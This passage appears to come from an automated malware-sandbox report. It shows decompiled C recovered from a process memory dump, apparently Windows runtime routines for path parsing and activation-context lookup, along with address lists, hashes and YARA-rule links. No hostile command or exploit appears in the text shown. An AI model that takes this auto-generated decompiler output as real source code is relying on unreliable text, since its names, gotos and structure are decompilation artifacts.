														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04FC52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04FDEB70(1, 0x50b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04FDAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E050095D0();
																			L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0500B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05003D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0500B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04fe4128
0x04fe4135
0x04fe413c
0x04fe4141
0x04fe4145
0x04fe4147
0x04fe414e
0x04fe4151
0x04fe4159
0x04fe415c
0x04fe4160
0x04fe4164
0x04fe4168
0x04fe416c
0x04fe417f
0x04fe4181
0x04fe446a
0x04fe446a
0x04fe418c
0x04fe4195
0x04fe4199
0x04fe4432
0x04fe4439
0x04fe443d
0x04fe4442
0x04fe4447
0x00000000
0x04fe419f
0x04fe41a3
0x04fe41b1
0x04fe41b9
0x04fe41bd
0x04fe45db
0x04fe45db
0x00000000
0x04fe41c3
0x04fe41c3
0x04fe41ce
0x04fe41d4
0x0502e138
0x0502e13e
0x0502e169
0x0502e16d
0x0502e19e
0x0502e16f
0x0502e16f
0x0502e175
0x0502e179
0x0502e18f
0x0502e193
0x00000000
0x0502e199
0x00000000
0x0502e199
0x0502e193
0x00000000
0x00000000
0x00000000
0x04fe41da
0x04fe41da
0x04fe41df
0x04fe41e4
0x04fe41ec
0x04fe4203
0x04fe4207
0x0502e1fd
0x04fe4222
0x04fe4226
0x0502e1f3
0x0502e1f3
0x04fe422c
0x04fe422c
0x04fe4233
0x0502e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe4239
0x04fe4239
0x04fe4239
0x04fe4239
0x04fe4233
0x04fe4226
0x04fe41ee
0x04fe41ee
0x04fe41f4
0x04fe4575
0x0502e1b1
0x0502e1b1
0x00000000
0x04fe457b
0x04fe457b
0x04fe4582
0x0502e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe4588
0x04fe4588
0x04fe458c
0x0502e1c4
0x0502e1c4
0x00000000
0x04fe4592
0x04fe4592
0x04fe4599
0x0502e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe459f
0x04fe459f
0x04fe45a3
0x0502e1d7
0x0502e1e4
0x00000000
0x04fe45a9
0x04fe45a9
0x04fe45b0
0x0502e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe45b6
0x04fe45b6
0x04fe45b6
0x00000000
0x04fe45b6
0x04fe45b0
0x04fe45a3
0x04fe4599
0x04fe458c
0x04fe4582
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe41f4
0x04fe423e
0x04fe4241
0x04fe45c0
0x04fe45c4
0x00000000
0x04fe45ca
0x04fe45ca
0x00000000
0x0502e207
0x0502e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x04fe45d1
0x00000000
0x00000000
0x04fe45ca
0x00000000
0x04fe4247
0x04fe4247
0x04fe4247
0x04fe4249
0x04fe4249
0x04fe4249
0x04fe4251
0x04fe4251
0x04fe4257
0x04fe425f
0x04fe426e
0x04fe4270
0x04fe427a
0x0502e219
0x0502e219
0x04fe4280
0x04fe4282
0x04fe4456
0x04fe45ea
0x00000000
0x04fe45f0
0x0502e223
0x00000000
0x0502e223
0x04fe445c
0x04fe445c
0x00000000
0x04fe445c
0x00000000
0x04fe4288
0x04fe428c
0x0502e298
0x04fe4292
0x04fe4292
0x04fe429e
0x04fe42a3
0x04fe42a7
0x04fe42ac
0x0502e22d
0x04fe42b2
0x04fe42b2
0x04fe42b9
0x04fe42bc
0x04fe42c2
0x04fe42ca
0x04fe42cd
0x04fe42cd
0x04fe42d4
0x04fe433f
0x04fe433f
0x04fe42d6
0x04fe42d6
0x04fe42d9
0x04fe42dd
0x04fe42eb
0x0502e23a
0x04fe42f1
0x04fe4305
0x04fe430d
0x04fe4315
0x04fe4318
0x04fe431f
0x04fe4322
0x04fe432e
0x04fe433b
0x04fe433b
0x00000000
0x04fe432e
0x04fe42eb
0x04fe434c
0x04fe434e
0x04fe4352
0x04fe4359
0x04fe435e
0x04fe4361
0x04fe436e
0x04fe438a
0x04fe438e
0x04fe4396
0x04fe439e
0x04fe43a1
0x04fe43ad
0x04fe43bb
0x04fe43bb
0x04fe43ad
0x04fe436e
0x04fe43bf
0x04fe43c5
0x04fe4463
0x04fe4463
0x04fe43ce
0x04fe43d5
0x04fe43d9
0x04fe43df
0x04fe4475
0x04fe4479
0x04fe4491
0x04fe4491
0x04fe4479
0x04fe43e5
0x04fe43eb
0x04fe43f4
0x04fe43f6
0x04fe43f9
0x04fe43fc
0x04fe43ff
0x04fe44e8
0x04fe44ed
0x04fe44f3
0x0502e247
0x00000000
0x04fe44f9
0x04fe4504
0x04fe4508
0x04fe450f
0x0502e269
0x00000000
0x04fe4515
0x04fe4519
0x04fe4531
0x04fe4534
0x04fe4537
0x04fe453e
0x04fe4541
0x04fe454a
0x0502e255
0x0502e255
0x0502e25b
0x0502e25e
0x0502e261
0x0502e261
0x04fe4555
0x04fe4559
0x04fe455d
0x0502e26d
0x0502e270
0x0502e274
0x0502e27a
0x0502e27d
0x0502e28e
0x0502e28e
0x04fe4563
0x04fe4563
0x04fe4569
0x04fe4569
0x00000000
0x04fe455d
0x04fe450f
0x00000000
0x04fe44f3
0x04fe43ff
0x04fe4405
0x04fe4405
0x04fe4405
0x04fe42ac
0x04fe428c
0x04fe4282
0x04fe4407
0x04fe440d
0x0502e2af
0x0502e2af
0x04fe4413
0x04fe4413
0x00000000
0x04fe41d4
0x00000000
0x04fe41c3
0x04fe41bd
0x04fe4415
0x04fe4415
0x04fe4416
0x04fe4417
0x04fe4429
0x04fe416e
0x04fe416e
0x04fe4175
0x04fe4498
0x04fe449f
0x0502e12d
0x00000000
0x0502e133
0x00000000
0x0502e133
0x04fe44a5
0x04fe44a5
0x04fe44aa
0x00000000
0x04fe44bb
0x04fe44ca
0x04fe44d6
0x04fe44d7
0x04fe44d8
0x04fe44e3
0x04fe44e3
0x04fe44aa
0x04fe417b
0x04fe417b
0x04fe417b
0x00000000
0x04fe417b
0x04fe4175
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce6fae83ded6eb2d59e5f6915ca90db0874c7d58cb01e63bf6a48ab2058b321
Instruction ID: 2cbe3b5e8f71c2916b8e2ae37be67f228716d3982bf50a8f31b1c149909fb631
Opcode Fuzzy Hash: cce6fae83ded6eb2d59e5f6915ca90db0874c7d58cb01e63bf6a48ab2058b321
Instruction Fuzzy Hash: 76F181716083118FD724CF1AC480A3AB7E5FF88705F15492EF886CB290E734E946DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04FF20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04FF20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x50b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04FF2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04FF2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04FC58EC(_t240);
									_t221 =  *0x50b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x50b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05004A2C(0x50b6e40, 0x5004b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04FE7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4fa5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04FFF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04FFF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05047016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04FE2400(_t267 + 0x20);
															}
															L04FE2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04FF2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04FE2280(_t134, 0x50b8608);
									__eflags =  *0x50b6e48 - _t253; // 0x320d998
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04FDFFB0(_t198, _t241, 0x50b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x50b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x50b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04FF6B90(_t210,  &_v64);
										_t262 =  *0x50b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04FFE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E050097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0500006A(0x50b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x50b8608);
												E0500B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x50b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x50b6e48; // 0x320d998
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04FDFFB0(_t198, _t240, 0x50b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E050000C2(0x50b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x04ff20a0
0x04ff20a8
0x04ff20ad
0x04ff20b3
0x04ff20b8
0x04ff20c2
0x04ff20c7
0x04ff20cb
0x04ff20d2
0x04ff2263
0x04ff2266
0x05035836
0x05035836
0x00000000
0x04ff226c
0x04ff226c
0x04ff2270
0x04ff2274
0x04ff20e2
0x04ff20e2
0x04ff20e6
0x04ff20ee
0x050357dc
0x050357de
0x050357ec
0x050357ec
0x050357f1
0x050357f3
0x050357f8
0x00000000
0x050357f8
0x050357e0
0x050357e4
0x050357ea
0x00000000
0x00000000
0x00000000
0x050357ea
0x04ff20f4
0x04ff20f4
0x04ff20f8
0x04ff20f8
0x04ff20fc
0x04ff2100
0x04ff2106
0x04ff2201
0x04ff2206
0x04ff220b
0x04ff220e
0x04ff22a9
0x04ff22ac
0x00000000
0x00000000
0x04ff22b2
0x04ff22b5
0x05035801
0x05035806
0x00000000
0x00000000
0x05035810
0x05035815
0x05035818
0x00000000
0x00000000
0x0503581e
0x04ff22bb
0x04ff22bb
0x04ff2218
0x04ff2218
0x04ff221c
0x04ff2220
0x04ff2222
0x04ff22c2
0x04ff22c4
0x04ff22dc
0x04ff22dc
0x04ff22e1
0x00000000
0x00000000
0x00000000
0x04ff22e7
0x04ff22c8
0x04ff22cd
0x04ff22d3
0x04ff22d6
0x05035823
0x05035825
0x05035827
0x00000000
0x00000000
0x0503582d
0x00000000
0x0503582d
0x00000000
0x04ff2228
0x04ff2228
0x00000000
0x04ff2228
0x04ff2222
0x04ff2214
0x04ff2214
0x00000000
0x04ff2114
0x04ff2114
0x04ff2114
0x04ff211a
0x04ff211c
0x04ff2348
0x04ff234d
0x05035840
0x05035845
0x05035848
0x0503584e
0x0503584e
0x05035848
0x04ff2353
0x04ff2355
0x04ff2388
0x04ff2388
0x04ff2368
0x04ff236a
0x04ff236c
0x04ff238f
0x00000000
0x04ff236e
0x04ff236e
0x04ff218e
0x04ff218e
0x04ff2191
0x04ff2195
0x05035a03
0x05035a06
0x05035a0c
0x05035a0f
0x05035a11
0x05035a13
0x05035a13
0x05035a19
0x05035a1f
0x00000000
0x04ff219b
0x04ff219b
0x04ff21a0
0x04ff2282
0x04ff2284
0x04ff2284
0x04ff2284
0x04ff2284
0x04ff21a6
0x04ff21a9
0x04ff21ac
0x04ff21ae
0x04ff21b3
0x04ff228b
0x04ff2290
0x04ff2379
0x04ff2296
0x04ff2298
0x04ff2298
0x04ff2290
0x04ff21b9
0x04ff21be
0x04ff22a2
0x04ff22a2
0x04ff21c4
0x04ff21c8
0x04ff21cc
0x04ff21d0
0x04ff21d4
0x04ff21de
0x04ff21e3
0x05035a29
0x05035a2c
0x00000000
0x00000000
0x05035a3b
0x00000000
0x04ff21e9
0x04ff21e9
0x04ff21e9
0x04ff21ee
0x04ff21f1
0x05035a45
0x05035a4b
0x05035a52
0x05035a58
0x05035a5d
0x05035a5f
0x05035a71
0x05035a61
0x05035a6a
0x05035a6a
0x05035a76
0x05035a79
0x05035a7f
0x05035a83
0x05035a85
0x05035a87
0x05035a87
0x05035a8c
0x05035a91
0x05035a97
0x05035a9f
0x05035aa0
0x05035aa1
0x05035aa6
0x05035aab
0x05035ab1
0x05035ab3
0x05035ab9
0x05035aca
0x05035ad4
0x05035ad4
0x05035ade
0x05035ade
0x05035aab
0x05035a79
0x05035a52
0x04ff21f7
0x04ff21f9
0x04ff21fe
0x04ff21fe
0x04ff21e3
0x04ff2195
0x04ff236c
0x04ff2122
0x04ff2122
0x04ff2124
0x04ff2231
0x04ff2236
0x04ff2236
0x04ff2238
0x04ff2238
0x04ff2240
0x04ff2242
0x04ff2244
0x050359fc
0x04ff218c
0x04ff218c
0x00000000
0x04ff218c
0x04ff224a
0x04ff224f
0x04ff2256
0x04ff2304
0x04ff2309
0x04ff230f
0x04ff231e
0x04ff231e
0x04ff231e
0x04ff2320
0x04ff2325
0x04ff232a
0x04ff232c
0x04ff233e
0x04ff233e
0x00000000
0x04ff232c
0x04ff2311
0x04ff2317
0x04ff231a
0x04ff231c
0x04ff2380
0x04ff2380
0x04ff2380
0x04ff2384
0x00000000
0x00000000
0x04ff2386
0x00000000
0x04ff231c
0x04ff225c
0x04ff225c
0x00000000
0x04ff225c
0x04ff212a
0x04ff2134
0x04ff2138
0x04ff213d
0x05035858
0x05035863
0x05035863
0x05035867
0x0503586a
0x00000000
0x00000000
0x0503586c
0x0503586c
0x05035871
0x05035875
0x05035877
0x05035997
0x0503599c
0x050359a1
0x050359a7
0x050359a7
0x00000000
0x050359a7
0x0503587d
0x00000000
0x0503588b
0x0503588b
0x05035890
0x05035892
0x05035894
0x05035899
0x0503589b
0x050358a0
0x050358a0
0x050358aa
0x050358b2
0x050358b6
0x050358be
0x050358c6
0x050358c9
0x0503590d
0x05035917
0x0503591a
0x0503591c
0x05035920
0x05035928
0x0503592a
0x0503592c
0x0503592e
0x0503592e
0x050358cb
0x050358cd
0x050358d8
0x050358e0
0x050358f4
0x050358fe
0x050358fe
0x0503593a
0x0503593e
0x05035940
0x05035942
0x00000000
0x05035944
0x05035944
0x05035949
0x0503594e
0x0503594e
0x05035953
0x0503595b
0x05035976
0x05035976
0x0503597a
0x0503597f
0x00000000
0x00000000
0x00000000
0x00000000
0x05035981
0x05035981
0x05035981
0x05035983
0x05035988
0x0503598d
0x05035991
0x05035991
0x00000000
0x0503595d
0x0503595d
0x05035963
0x05035965
0x00000000
0x00000000
0x00000000
0x00000000
0x05035967
0x05035967
0x0503596b
0x0503596d
0x00000000
0x00000000
0x0503596f
0x05035971
0x05035971
0x05035974
0x00000000
0x00000000
0x00000000
0x05035974
0x00000000
0x05035967
0x0503595b
0x05035942
0x05035863
0x04ff2143
0x04ff2143
0x04ff2149
0x04ff214f
0x04ff22f1
0x04ff22f6
0x00000000
0x04ff2173
0x04ff2173
0x04ff217d
0x04ff2181
0x04ff2186
0x050359ae
0x050359b2
0x050359b5
0x050359b7
0x050359ba
0x050359cd
0x050359d1
0x050359d5
0x050359d9
0x050359db
0x00000000
0x00000000
0x050359dd
0x050359dd
0x050359e1
0x050359e4
0x050359e7
0x050359ee
0x050359ee
0x050359f3
0x050359f3
0x00000000
0x04ff2186
0x04ff214f
0x04ff2106
0x04ff2266
0x04ff20d8
0x04ff20da
0x04ff20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2a7d02f8f178b79f6764bba277d2db15cabd2aae664d0a102a1d440782ff43
Instruction ID: f0ab415a5c37bf8a2f1a286fbfbd135eadeb8c35370c978eabe800834cdf788c
Opcode Fuzzy Hash: eb2a7d02f8f178b79f6764bba277d2db15cabd2aae664d0a102a1d440782ff43
Instruction Fuzzy Hash: AAF13931A083019FE725CF68DC8176E77E6BF85314F05895DEA559B2B0E736E842CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04FDD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04FDD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
